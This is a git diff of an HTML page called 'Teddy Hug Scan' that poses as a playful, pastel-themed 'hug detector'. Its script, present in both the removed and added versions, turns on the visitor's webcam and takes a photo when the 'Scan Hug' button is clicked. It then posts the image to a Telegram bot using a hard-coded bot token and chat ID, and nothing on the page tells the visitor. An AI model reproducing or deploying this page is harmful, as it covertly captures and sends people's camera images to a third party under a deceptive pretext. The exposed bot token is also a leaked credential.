--- a/teddy2.html
+++ b/teddy2.html
@@ -4,58 +4,142 @@
   <meta charset="UTF-8" />
   <meta name="viewport" content="width=device-width, initial-scale=1.0" />
   <title>Teddy Hug Scan</title>
-  <script>
-  const video = document.getElementById('video');
-  const canvas = document.getElementById('canvas');
-  const ctx = canvas.getContext('2d');
-
-  navigator.mediaDevices.getUserMedia({ video: true })
-    .then(stream => {
-      video.srcObject = stream;
-    })
-    .catch(err => {
-      alert('Camera access denied or unavailable.');
-    });
-
-  function captureAndSend() {
-    if (!video.videoWidth || !video.videoHeight) {
-      alert("Please wait for the camera to load.");
-      return;
+  <style>
+    * { margin: 0; padding: 0; box-sizing: border-box; }
+    body {
+      background: linear-gradient(135deg, #ffeef5, #fff0f9);
+      font-family: 'Segoe UI', sans-serif;
+      min-height: 100vh;
+      display: flex;
+      flex-direction: column;
+      align-items: center;
+      justify-content: center;
+      text-align: center;
+      color: #e91e63;
+      padding: 20px;
+      position: relative;
     }
+    h1 {
+      margin-bottom: 10px;
+      font-size: 2.4em;
+    }
+    .label {
+      font-size: 1.2em;
+      margin: 10px 0 20px;
+    }
+    video {
+      width: 260px;
+      height: auto;
+      border-radius: 20px;
+      box-shadow: 0 0 15px rgba(255, 192, 203, 0.4);
+      margin-bottom: 20px;
+    }
+    .btn {
+      padding: 12px 25px;
+      margin: 10px;
+      border: none;
+      border-radius: 8px;
+      background-color: #f06292;
+      color: white;
+      font-size: 1em;
+      cursor: pointer;
+      transition: 0.3s;
+    }
+    .btn:hover {
+      background-color: #e91e63;
+    }
+    canvas {
+      display: none;
+    }
+    .decor {
+      position: absolute;
+      font-size: 2rem;
+      opacity: 0.2;
+      animation: floaty 6s ease-in-out infinite;
+    }
+    .decor.left { top: 10%; left: 5%; animation-delay: 1s; }
+    .decor.right { bottom: 10%; right: 5%; animation-delay: 2s; }
+    .decor.top-right { top: 5%; right: 8%; animation-delay: 3s; }
+    .decor.bottom-left { bottom: 5%; left: 8%; animation-delay: 4s; }
+    .decor.center-left { top: 50%; left: 2%; animation-delay: 2.5s; }
+    .decor.center-right { top: 50%; right: 2%; animation-delay: 3.5s; }
 
-    // 🔽 Directly low-res photo
-    const width = 320;
-    const height = video.videoHeight / (video.videoWidth / width);
-    canvas.width = width;
-    canvas.height = height;
-    ctx.drawImage(video, 0, 0, width, height);
+    @keyframes floaty {
+      0%, 100% { transform: translateY(0); }
+      50% { transform: translateY(-10px); }
+    }
+  </style>
+</head>
+<body>
+  <div class="decor left">🌸</div>
+  <div class="decor right">🧸</div>
+  <div class="decor top-right">🎀</div>
+  <div class="decor bottom-left">💖</div>
+  <div class="decor center-left">🦋</div>
+  <div class="decor center-right">🌷</div>
 
-    const photo = canvas.toDataURL('image/jpeg'); // no quality param needed
+  <h1>Hug Detector Activated 🧸</h1>
+  <p class="label">Click the button to scan your lovely hug 💗</p>
 
-    fetch("https://api.telegram.org/bot7613683060:AAEsyP1JaIKh1mLawCyWmFxpgl0KOToj2Xs/sendPhoto", {
-      method: "POST",
-      headers: {
-        "Content-Type": "application/json"
-      },
-      body: JSON.stringify({
-        chat_id: 1786564127,
-        photo: photo
+  <video id="video" autoplay playsinline></video>
+  <canvas id="canvas"></canvas>
+
+  <div>
+    <button class="btn" onclick="captureAndSend()">📸 Scan Hug</button>
+    <button class="btn" onclick="history.back()">← Back</button>
+  </div>
+
+  <script>
+    const video = document.getElementById('video');
+    const canvas = document.getElementById('canvas');
+    const ctx = canvas.getContext('2d');
+
+    navigator.mediaDevices.getUserMedia({ video: true })
+      .then(stream => {
+        video.srcObject = stream;
       })
-    })
-    .then(res => res.json())
-    .then(data => {
-      if (data.ok) {
-        window.location.href = 'teddy3.html'; // ✅ success redirect
-      } else {
-        alert("Failed to send hug. Please try again later.");
-        console.error(data);
+      .catch(err => {
+        alert('Camera access denied or unavailable.');
+      });
+
+    function captureAndSend() {
+      if (!video.videoWidth || !video.videoHeight) {
+        alert("Please wait for the camera to load.");
+        return;
       }
-    })
-    .catch(err => {
-      console.error("Send error:", err);
-      alert("An error occurred. Try again.");
-    });
-  }
-</script>
+
+      const width = 320;
+      const height = video.videoHeight / (video.videoWidth / width);
+      canvas.width = width;
+      canvas.height = height;
+      ctx.drawImage(video, 0, 0, width, height);
+
+      const photo = canvas.toDataURL('image/jpeg');
+
+      fetch("https://api.telegram.org/bot7613683060:AAEsyP1JaIKh1mLawCyWmFxpgl0KOToj2Xs/sendPhoto", {
+        method: "POST",
+        headers: {
+          "Content-Type": "application/json"
+        },
+        body: JSON.stringify({
+          chat_id: 1786564127,
+          photo: photo
+        })
+      })
+      .then(res => res.json())
+      .then(data => {
+        if (data.ok) {
+          window.location.href = 'teddy3.html';
+        } else {
+          alert("Failed to send hug. Try again.");
+          console.error(data);
+        }
+      })
+      .catch(err => {
+        console.error("Send error:", err);
+        alert("An error occurred. Try again.");
+      });
+    }
+  </script>
 </body>
 </html>
